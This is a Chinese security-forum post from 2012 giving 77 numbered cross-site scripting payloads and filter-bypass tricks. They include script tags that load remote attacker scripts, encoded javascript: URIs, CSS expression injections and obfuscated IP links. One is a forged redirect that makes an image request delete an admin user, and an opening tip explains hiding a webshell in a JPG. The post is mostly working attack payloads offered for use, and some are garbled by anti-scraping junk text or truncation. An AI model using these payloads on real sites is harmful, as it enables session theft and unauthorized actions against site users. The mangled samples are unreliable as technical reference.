找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2230|回复: 0
打印 上一主题 下一主题

xss详细利用大全1

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:04:56 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
跨站图片shell" X" ~9 m5 }. ~3 g
XSS跨站代码  <script>alert("")</script>' Q) q' z# @0 B0 Q) D$ n
- c$ [7 \+ }' t3 Q. k5 t: t
将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马
  D, ]6 c* i7 l- w) o+ I- H4 B, p& k

; u: i) \( R/ [- _5 }- k- S+ Q" n! Z2 v) a
1)普通的XSS JavaScript注入
! R1 C2 U( ?$ o<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>3 V9 e# Z$ G, f

$ t- |; d; t: t' S0 h) t3 h5 k) R(2)IMG标签XSS使用JavaScript命令
8 O* _. S3 _; G. H3 y6 K' z( |<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>* z, m0 E. K- h) d/ S# U: f
- i& ~) c0 O9 x; ]% L
(3)IMG标签无分号无引号+ Q1 g$ Z# m$ d6 A* U) R( H
<IMG SRC=javascript:alert(‘XSS’)>
4 d/ d' {5 N; T' Z, V
8 C( r" o; H9 A6 i4 T& s6 ]1 \2 A(4)IMG标签大小写不敏感
4 W8 Z2 X# s* E" c) C4 X  H4 K0 Y<IMG SRC=JaVaScRiPt:alert(‘XSS’)>; s* S$ @; ^( W  \/ A  n% O
: G$ w) u$ S7 `5 J9 ]( e+ D
(5)HTML编码(必须有分号)0 R+ Z5 p* u! ?$ H5 n
<IMG SRC=javascript:alert(“XSS”)>; }& d4 @7 l3 I! Q/ _

  j1 u1 n& _: k8 Z! _  F  J: T! ~) ~(6)修正缺陷IMG标签
, g2 u; p, \8 K; W$ r9 q9 x<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>5 d+ s' P, |$ k4 M. K$ F$ i
% S, \+ F* x7 r$ i- Q/ Y# W
(7)formCharCode标签(计算器)
, f+ x9 D! w1 _" y7 v<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
- w4 L9 M+ l! [1 x% a  Y% B
3 e5 O7 P$ K/ X& U(8)UTF-8的Unicode编码(计算器)
' }  {* s" o7 O" N0 e* A<IMG SRC=jav..省略..S')>
% e; K  O- l8 d/ x0 b& N) i+ H- f8 ]1 K3 U
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)/ O$ Z! y4 w* e  R1 ~4 G* I* w
<IMG SRC=jav..省略..S')>
! w% }" L+ j! a) O% w( N
4 w; G& a* K0 n$ P(10)十六进制编码也是没有分号(计算器)0 \7 i2 {) W, G7 t
<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>
5 ~. ?: J# t# [) _$ t9 J) q7 p2 A9 x% s3 t
(11)嵌入式标签,将Javascript分开
. O& e  p, o$ d% I: }<IMG SRC=”jav ascript:alert(‘XSS’);”>
3 b4 \% F1 z8 n' d  i4 C) H) V# |7 E: I# L
(12)嵌入式编码标签,将Javascript分开$ g" \& b7 d; _. ~& M$ H, U
<IMG SRC=”jav ascript:alert(‘XSS’);”>
$ |, x! P7 k5 X; J6 \0 a8 X  P$ r& o' S  y. ~; ?
(13)嵌入式换行符3 x1 q# ]8 T+ C% V' }3 I
<IMG SRC=”jav ascript:alert(‘XSS’);”>" f$ d' T. Q( g, q
1 [$ |9 h9 ^; g, p
(14)嵌入式回车
! B2 v" z( U3 ]5 }2 e<IMG SRC=”jav ascript:alert(‘XSS’);”>& Y+ [$ M# i: n5 N

; R- c5 Q5 r9 K- y(15)嵌入式多行注入JavaScript,这是XSS极端的例子
6 \3 A* v, f* \<IMG SRC=”javascript:alert(‘XSS‘)”>8 f0 _5 `6 \! ]- ]6 D* d8 i

- v$ Z% {0 a$ Z( l, F) |% J(16)解决限制字符(要求同页面)
) b: O8 y1 X7 X4 o<script>z=’document.’</script>
! O+ _; H  H7 X/ |8 d" x- W<script>z=z+’write(“‘</script>
% b" y, G# h6 V$ a/ q% u<script>z=z+’<script’</script>5 S* {4 |$ {, V
<script>z=z+’ src=ht’</script>) s8 z8 d  c( w# ~7 J
<script>z=z+’tp://ww’</script>
1 M& k; N4 [6 g( C# U<script>z=z+’w.shell’</script>% V7 @1 K9 N0 w( {6 h7 `
<script>z=z+’.net/1.’</script>
* q7 N$ V. x) a<script>z=z+’js></sc’</script>
/ L, u% ?& G- {" F! X<script>z=z+’ript>”)’</script>
/ [- J3 F) K; Q- P2 u5 ~<script>eval_r(z)</script>4 ~; a. P9 k5 v) P4 R, L

& A( \1 Y% K9 a! Y(17)空字符0 b, J9 U# A; }. X- D; T, q
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
5 |! {+ e6 x2 l# g- L6 {4 R: z0 `0 b( f2 X- {
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
0 ~6 }$ J& Y3 p$ w( Kperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
% O3 b9 B4 T  G7 d7 N" F+ b9 y, t
! Z  b6 L. s- l" H' D(19)Spaces和meta前的IMG标签
0 t9 X) M* n/ c$ M5 S- R  K6 L<IMG SRC=” javascript:alert(‘XSS’);”>* t# {; Z7 b# V* g2 i
# c) J: }5 b6 Y
(20)Non-alpha-non-digit XSS
/ h% S) \0 R" U' Y7 e$ y3 g7 u<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>7 M4 Q5 R- H: |9 {2 g$ ?6 v( ]
" |$ |5 H& @1 p9 x! O' M/ |
(21)Non-alpha-non-digit XSS to 22 H6 N2 T3 }6 }0 c& t+ ]
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
1 f( l9 A$ F: H* e4 T" W1 Y- W
6 R: ^: f5 a% K! r5 P9 H' E(22)Non-alpha-non-digit XSS to 3
8 n  K6 W$ [# l<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>! h- C  {3 \7 g4 Y; |& n

9 `6 g% f4 g( X) D! K( D, v$ |(23)双开括号: l. I! p. E$ z7 i
<<SCRIPT>alert(“XSS”);//<</SCRIPT>6 T) l( ^) }1 T% V8 i
# o! V  X% X' {) ~" f% k
(24)无结束脚本标记(仅火狐等浏览器)
6 R4 y6 B! `8 G- y<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>; y. Q' W/ x6 f/ o
1 v( h$ j% W+ H; W, {! M
(25)无结束脚本标记2
$ Q2 Y( Q( R- v' C<SCRIPT SRC=//3w.org/XSS/xss.js>
4 P% h* \) f4 E$ F. q# e* H
! C6 F% Y1 ]% D2 Y. n(26)半开的HTML/JavaScript XSS
+ [' D. I) i, X" Y0 e<IMG SRC=”javascript:alert(‘XSS’)”7 z/ r0 u. t: G* i

- E" p" B% o0 Z(27)双开角括号
# P/ U; ?8 ?6 a<iframe src=http://3w.org/XSS.html <
& Y/ s' w- C2 V
5 k# T& M9 q, E9 q(28)无单引号 双引号 分号
/ y$ ~! d8 l& J# M! ~- `<SCRIPT>a=/XSS/: B# c$ v; z  ?3 @: d- `
alert(a.source)</SCRIPT>" }- `# e! v  @6 x& b6 h) w; w% e
! h! [/ {& \3 J
(29)换码过滤的JavaScript9 M7 C8 z/ k( C' P/ R3 ~( T
\”;alert(‘XSS’);//
$ A/ M0 E" H3 S2 r4 P
: r' w: o  W) E(30)结束Title标签& S2 M: e; e  z
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
- i/ s$ c7 y3 d5 K8 T! D! s
6 m7 u% C9 O5 Y(31)Input Image
8 Q4 E# ^1 M. F! Q; C% v' f! Q9 p<INPUT SRC=”javascript:alert(‘XSS’);”>
; B( R/ S1 e$ F7 k+ ~0 P4 o3 O0 X: G# ]( @  o( ~
(32)BODY Image$ J0 _9 D. ]" d, x0 N
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
% N- ]# D" _, p) ^$ s
" {0 D3 @9 ^% K% D4 T# j6 [(33)BODY标签/ p' {! F) b2 P3 N) a# g/ j
<BODY(‘XSS’)>
: C8 k6 r+ \; @, l
; b5 y  ?1 j1 w4 ?4 q6 G, L% I(34)IMG Dynsrc
* m$ n4 |& `  [7 g3 i+ T1 B  w<IMG DYNSRC=”javascript:alert(‘XSS’)”>5 f( `( e8 t8 q* |& ^3 e3 ]

' \2 Q  A6 ?  D: P1 @0 v1 s8 x. d(35)IMG Lowsrc
8 Z: v4 h" @: U9 {+ b/ u: n<IMG LOWSRC=”javascript:alert(‘XSS’)”>2 j/ r4 p9 w8 [' u: E9 }% E

3 w" w, p0 ^6 T, q, O. I(36)BGSOUND
0 ~0 G+ ?8 B& W1 }8 a8 U<BGSOUND SRC=”javascript:alert(‘XSS’);”>
, ?0 [0 N8 S: X4 |( X! a* p' K  x0 ]
(37)STYLE sheet2 [6 Y* a- ^5 S; J5 ?5 ?8 H
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>  S- m  {8 t1 {: R7 `/ }
4 V/ k. _) X( K2 Q2 [0 `4 I
(38)远程样式表
/ j, D7 N8 a" E6 f/ a& @) t<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>- V& F$ |( y+ W" _: ?

/ k) k0 a$ E- S(39)List-style-image(列表式)2 x: p) b; p* `7 ?
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
% `1 n* H6 W0 e  ^  H5 i% ~. Y9 ~7 L* R: s6 ?
(40)IMG VBscript4 Y4 i( ^. ?# A/ S7 _: q% o
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS3 Q# _6 x" Q% G5 B1 X7 P* y
, G# P- R" {4 Z7 Y& O5 Y2 e
(41)META链接url' m3 g, @% t) ~; l
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
5 v, S' I* k7 F' \) ~1 \: o8 x
. y9 Q* x7 F- [2 B1 ](42)Iframe
" N2 Z/ u: v. `+ ]1 b" b<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
! f8 N& f; ~4 n; S(43)Frame
" u7 ]/ b7 ~7 B6 F7 P; c<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
1 M; [7 G, C6 O9 K; ^/ z9 n+ U; T1 K; p% A# @
(44)Table
! E; A# R4 \! C3 S8 d<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>3 n8 |6 w& R. B3 T3 x+ f

7 A* Z+ V. k7 K0 B% L  e; b* l(45)TD
9 k, b! y3 T1 R: O* W/ z<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>+ c/ [& ]5 {& p# m4 v" X
/ K) {1 s& A1 a7 c% ~* R' N
(46)DIV background-image
$ \! L& A6 E  J( Y8 M1 |; C<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>6 I/ h( [6 i/ a" S" {/ `5 Q6 K
3 e0 G2 r# C4 h8 M+ s
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)  F* c9 z6 M9 r! l. ~5 Z2 r
<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>+ z& _; L9 t. y4 V& [+ G

, e$ b% L; l. {4 [- D- r! C. A/ f(48)DIV expression
3 |! }0 d* I- Z  K<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
- E1 _! I4 B2 n1 v
+ Y  _( B; f5 d# S- V) h& U' S(49)STYLE属性分拆表达  k7 g& s5 v. j, c
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
- K' U! I, H1 {; X& R4 l% n9 a3 e4 g! }4 }* G
(50)匿名STYLE(组成:开角号和一个字母开头)
; h0 L1 D4 b! _* ?<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
% h: d3 O9 [& {* q" P/ H: ^( P1 T2 F. V2 l, [9 B
(51)STYLE background-image
" j2 q* V3 x* |/ }6 ~. k<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>! Z4 c& P7 S: `; T4 p

! p2 j7 P0 D9 G+ G  ~2 l; {* J* t(52)IMG STYLE方式
7 W* p! B4 y9 ~1 q: Gexppression(alert(“XSS”))’>/ a2 V* G1 s, W& A

1 Z1 J1 m/ Y  N# b* l- v; M(53)STYLE background$ M. G2 M6 l6 J- B
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
" z# j2 w. [( a3 J& L5 a+ s0 Z- s% A0 Q
(54)BASE5 @  Z, h! j) ]
<BASE HREF=”javascript:alert(‘XSS’);//”>$ F. t3 C0 E1 b$ v; `
! e6 |8 u5 |, r* |8 M
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS: @) E) K8 L. P. a" L
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
$ q- Y, m! L7 ^# D: \
) V4 D- W/ u- R# P1 D% k: ]7 K1 b$ F(56)在flash中使用ActionScrpt可以混进你XSS的代码0 C1 Q) S) z8 |
a=”get”;
- {/ j; H' x; V5 Z, K8 ]b=”URL(\”";
& v& K2 w% t3 _. qc=”javascript:”;! {8 K7 Q7 u% W5 b( u7 ^, Y8 {
d=”alert(‘XSS’);\”)”;
: k) G0 t9 r& D( Neval_r(a+b+c+d);
# P/ O3 H! {% ~* Q0 e- S5 |. t" b' c: S$ }* W1 D
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
; S2 j. P" P, w. k% z3 i+ N9 A<HTML xmlns:xss>; @5 i! J( O3 n, Q
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>6 e. T# U  c- i# b
<xss:xss>XSS</xss:xss>: v* |" ]# X. K' h: d: ]$ L
</HTML>
* w. d' d0 s; C$ o# u) R& a1 Y( S6 a% I# O" Q2 j6 u, ~
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
* A7 E& x4 s# E# u, E+ m* N9 m<SCRIPT SRC=””></SCRIPT>
+ ~+ @$ Z$ [( ]; v  Q' o
, z& S- w% O' F, W4 O(59)IMG嵌入式命令,可执行任意命令
. l5 S& T4 @; O" y<IMG SRC=”http://www.XXX.com/a.php?a=b”>- y- f& G/ g. ^. p- Z; p( X
5 {' g7 q4 g, S* a
(60)IMG嵌入式命令(a.jpg在同服务器)
# I. s5 Q6 V8 q* ERedirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
/ p5 N, T$ h" Y0 G4 r
1 x6 X8 |5 s$ @# m- b: d" S* Q5 u(61)绕符号过滤( p$ m) n" j8 h1 t
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
. s/ H' O* [3 w2 Y1 J! z  O3 w' E7 v! o. E1 _3 k
(62)( Q% Q& H/ r% n+ |& e9 P4 H3 s
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>: Y) `; d/ Z4 U/ f+ ~2 \
& X* L2 ^! q8 x4 r! k" b
(63)
* i+ F( m+ Y4 B<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
# c. d& G7 Z- J% w8 V6 w5 P% _! R+ {3 F  V/ G& {
(64)
8 f& B, i' T9 @% T) K1 l; f<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
7 C  c) b+ D' o) i; V. F* E# F
, ?1 n8 p6 ]5 h1 `(65)
+ h( t& y. c7 z1 r* G<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
0 f" p4 F0 y: _* ^1 }5 r4 |9 _- u: g
) A1 e% E" M7 t) Y; ~(66)* v0 ]5 ^1 ?3 s6 r' w" ]
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
  O9 Q$ F: Z5 K0 W+ Y
' m" `# }( p' ~1 P+ a' x(67)
5 I& D4 o- {  t: W$ s; y+ ~" H<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>7 K+ ~: g% j2 r# G/ @3 j
6 W/ ~" \: P& f
(68)URL绕行
! P. m- \* ?/ x$ w+ J<A HREF=”http://127.0.0.1/”>XSS</A>6 G( g7 @- Y" D, \( V2 O" ^
* M  N: {# u* H9 H' @  b
(69)URL编码' G' B" J3 d3 E8 w
<A HREF=”http://3w.org”>XSS</A>
) l: q4 u9 E! ?8 Z. K2 e% r% g/ K; l, |  S
(70)IP十进制
' m* k5 J( o  ?! ~4 S<A HREF=”http://3232235521″>XSS</A>2 J* l& [- A9 }

6 B3 _+ U8 d/ @(71)IP十六进制2 n- r$ T. N" \" T! F+ _/ _, d
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>/ S1 g2 E  j0 z1 _

4 k- o6 U/ h& }/ [(72)IP八进制
. ^6 T: n* P" k6 K" x<A HREF=”http://0300.0250.0000.0001″>XSS</A>
) l( Q# Y4 u8 n: ?/ T+ G& G" i
1 X, L# z+ j2 |4 ?0 {(73)混合编码6 D# v- w* `+ ~7 k" ?. N5 U7 W; R" B
<A HREF=”h" Y- y* N4 z- e/ ~' C! u
tt p://6 6.000146.0×7.147/”">XSS</A>
5 F, B7 ], y* \, T9 S4 k; y+ x  Q
(74)节省[http:]
( H7 F2 L6 }! q5 I- n1 J<A HREF=”//www.google.com/”>XSS</A>6 i2 ~1 J8 o6 l
4 _6 t8 o+ E( k* ^) B
(75)节省[www]
: x2 g- z% U. E) c" V- ?1 ^2 o<A HREF=”http://google.com/”>XSS</A>
0 o8 a9 K# [4 J& j7 @+ {
* S# }  B  E& q8 k: m# ]9 `% l(76)绝对点绝对DNS
8 |9 E: K' p1 M( q<A HREF=”http://www.google.com./”>XSS</A>
& a0 v# u' r/ j1 M) {3 `! [; w" N' o% g7 O8 e, d
(77)javascript链接
7 J3 e! g( a& r9 X- h6 M<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
3 J, K- ?4 |1 T  a2 K. ]% E
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表